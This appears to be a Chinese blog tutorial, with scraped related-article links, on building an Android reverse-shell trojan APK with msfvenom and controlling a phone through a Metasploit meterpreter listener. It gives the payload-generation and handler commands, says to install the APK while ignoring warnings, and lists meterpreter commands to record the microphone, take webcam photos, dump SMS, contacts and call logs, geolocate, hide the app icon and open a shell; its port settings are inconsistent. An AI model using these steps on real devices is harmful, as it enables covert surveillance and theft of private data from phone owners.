|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负!

0.环境

  • 虚拟机 KaliLinux
  • 手机 Redmi 6A
  • 同一局域网下

1.查看控制端IP

ifconfig

即192.168.xx.xxx

2.生成木马程序

>>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk

-设置监听端主机lhost=192.168.xx.xxx

-设置监听端主机端口lhost=5555

-保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk



自动生成了一个10179 bytes 大小的程序

3.把hugboyMsf.apk安装到目标手机并运行

1).如何让虚拟机与主机数据分享,进而发送到手机上安装?

安装VMtools直接拖到本地桌面

Apt update

Apt install open-vm-tools-desktop fuse

Reboot

重启生效

2).发送到手机安装,忽略警告,点击继续。。。

4.打开metasploit工具



5.设置payload

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.xx.xxx

set LPORT 5555


exploit

6.显示meterpreter>说明连接成功

常用命令

+麦克风

-record_mic 从麦克风huhugb录制音频X秒

-h 帮助

-d 记录秒数

-F 音频保存路径,默认 HOME/xxxx.wav

-p 自动播放捕获的音频

+webcam_list 列出手机摄像头个数

+webcam_snap 从指定摄像头拍摄照片

-h 帮助

-I 选择要使用的摄像头

-p 图片路径,默认HOME/xxxx.jpeg

-q 图片质量,默认为50

-v 自动查看图片

+webcam_chat 开始视频聊天

+webcam_stream 从摄像拍摄视频

演示

列出设备的摄像头

webcma_list

选择第一个摄像头(后置摄像头)拍照

webcam_snap -i 1

全部命令

help

Stdapi: File system Commands

Command       Description

-------       -----------

cat           Read the contents of a file to the screen

cd            Change directory

checksum      Retrieve the checksum of a file

cp            Copy source to destination

dir           List files (alias for ls)

download      Download a file or directory

edit          Edit a file

getlwd        Print local working directory

getwd         Print working directory

lcd           Change local working directory

lls           List local files

lpwd          Print local working directory

ls            List files

mkdir         Make directory

mv            Move source to destination

pwd           Print working directory

rm            Delete the specified file

rmdir         Remove directory

search        Search for files

upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description

-------       -----------

ifconfig      Display interfaces

ipconfig      Display interfaces

portfwd       Forward a local port to a remote service

route         View and modify the routing table

Stdapi: System Commands

Command       Description

-------       -----------

execute       Execute a command

getuid        Get the user that the server is running as

localtime     Displays the target system's local date and time

pgrep         Filter processes by name

ps            List running processes

shell         Drop into a system command shell

sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command       Description

-------       -----------

screenshare   Watch the remote user's desktop in real time

screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

Command        Description

-------        -----------

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

Command       Description

-------       -----------

play          play a waveform audio file (.wav) on the target system

Android Commands

Command           Description

-------           -----------

activity_start    Start an Android activity from a Uri string

check_root        Check if device is rooted

dump_calllog      Get call log

dump_contacts     Get contacts list

dump_sms          Get sms messages

geolocate         Get current lat-long using geolocation

hide_app_icon     Hide the app icon from the launcher

interval_collect  Manage interval collection capabilities

send_sms          Sends SMS from target session

set_audio_mode    Set Ringer Mode

sqlite_query      Query a SQLite database from storage

wakelock          Enable/Disable Wakelock

wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands

Command        Description

-------        -----------

app_install    Request to install apk file

app_list       List installed apps in the device

app_run        Start Main Activty for package name

app_uninstall  Request to uninstall application

Msf--控制 Android手机的更多相关文章

  1. PC端轻松控制Android手机,PC Control Andoroid,PC控制安卓手机

    记录此次经历的目的是帮助需要的人或下次使用时少走弯路,我为此试用了不少工具及方法,因为追求免费,像"Weak Control:在PC上控制你的Android手机"还要收费的我就不弄 ...

  2. 苹果如何控制android手机,安卓手机怎么控制苹果?

    小编经常通过手机远程控制别人手机,帮助他人解决一些电脑问题,另外还经常需要通过远程电脑控制服务器,管理脚本之家的服务器等等,可能这些对大家都没有什么诱惑,今天笔者为大家带来一个非常有趣的手机控制电脑的 ...

  3. Scrcpy用电脑控制Android手机(支持Windows/macOS/Linux)

    一.scrcpy简介 注意:拼写是scrcpy,非Python爬虫框架Scrapy. scrcpy可以通过adb调试的方式来将手机屏幕投到电脑上,并可以通过电脑控制您的Android设备.它可以通过U ...

  4. 单片机与android手机通信(控制LED小灯亮灭)

    1.单片机实验板功能设计 为验证数据通信内容,让单片机板上的四个按键与android手机客户端上的四个LED灯相互控制:为达到上述基本实验要求,采用单字符传输数据即可,硬件需设计两块相同的单片机电路板 ...

  5. 用鼠标键盘来控制你的Android手机——同屏显示简单教程

    今天在微博上看到有人用电脑鼠标操作iPhone手机玩打飞机游戏,非常炫,虽然自己用的不是iPhone,但相信Android手机肯定也能实现这样的功能,于是网上各种搜索方法,终于看到了一篇试用成功的帖子 ...

  6. 我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(三)Android客户端功能实现

    我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(一)PC服务器端(地址:http://blog.csdn.net/ouyang_pen ...

  7. 电脑控制Android设备的软件——Total Control

    最早开始搞Android开发时,为了调试方便,想找一个Android下的远程控制软件,支持在电脑端远程控制和同步显示Android设备.先后试了360手机助手.Mobizen.Vysor和Mirror ...

  8. Pyqt adb 获取Android手机屏幕

    adb的全称为Android Debug Bridge,就是起到调试桥的作用.adb的工作方式比较特殊,采用监听Socket TCP 5554等端口的方式让IDE和Qemu通讯,默认情况下adb会da ...

  9. GPS部标平台的架构设计(六)-Android手机客户端和手机查车设计

    对于GPS软件平台,虽然有功能非常丰富的PC端或BS客户端,但是客户也是需要移动客户端来作为自己的辅助工具,也是需要的.做为GPS平台的设计者和开发者,在开发移动客户端的时候,也需要从常规的服务器开发 ...

  10. 为什么iphone手机比android手机流畅

    作为当下最流行.市场占用份额最大的两大手机操作系统IOS和android,目前两者加起来的市场占用率达到90%.我曾经一直用android手机,没有用过iphone,那时候正直iphone4和ipho ...

随机推荐

  1. Istio安全-证书管理(实操一)

    Istio安全-证书管理 目录 Istio安全-证书管理 插入现有CA证书 插入现有证书和密钥 部署Istio 配置示例services 校验证书 卸载 Istio的DNS证书管理 DNS证书的提供和 ...

  2. 在Win10中手动添加/修改本地IP

    1 前言 好久没动Win10了... 今天需要用Win10做一下实验,手动修改IP,于是写下了这篇文章作为过程记录. 2 概述 Win10里面修改本地IP不是一件特别困难的事,简单来说可以分为两种方式 ...

  3. BPF for storage:一种受外核启发的反式

    BPF for storage:一种受外核启发的反式 译自:BPF for storage: an exokernel-inspired approach BPF主要用于报文处理,通过绕过网络栈提高报 ...

  4. ForkJoinPool的工作原理和使用

    场景:当任务很多,成千上万个,或者单个任务很大,执行起来很耗时间,这时,就可以把任务进行拆分,拆分成多个小任务去执行,然后小任务执行完毕后再把每个小任务执行的结果合并起来,这样就可以节省时间. For ...

  5. Day11_50_SortedMap集合

    SortedMap集合 二叉查找树 和 二叉*衡树 二叉查找树是一种有序的树,所有的左孩子的value值都是小于叶子结点的value值的,所有右孩子的value值都是大于叶子结点的.这样做的好处在于: ...

  6. jasypt在springboot项目中遇到异常:Error creating bean with name 'enableEncryptablePropertySourcesPostProcessor' defined in class path resource

    背景 在使用jasypt对spring boot的配置文件中的敏感信息进行加密处理时,使用stater直接启动时,遇到了一个异常 <dependency> <groupId>c ...

  7. 前端数据渲染及mustache模板引擎的简单实现

    早期数据渲染的几种方式 在模板引擎没有诞生之前,为了用JS把数据渲染到页面上,诞生了一系列数据渲染的方式. 最最基础的,莫过于直接使用DOM接口创建所有节点. <div id="roo ...

  8. CTB-Locker敲诈者病毒下载器分析

    一. 样本基本信息 样本名称:927354529512.scr 样本大小:110592 字节 病毒名称:Win32.Trojan.Ctb-locker.Auto 样本MD5值:3A6D7E551C13 ...

  9. 一份释放root文件的脚本文件

    #!/system/bin/sh MYDIR=$3 ARGS=$4 SU=$MYDIR/au SUPOLICY=$MYDIR/supolicy BUSYBOX=$MYDIR/busybox TOOLB ...

  10. 路由器逆向分析------在Linux上安装IDA Pro

    本文博客地址:http://blog.csdn.net/qq1084283172/article/details/69665905 01.在Linux系统上安装Linux版本的IDA Pro Linu ...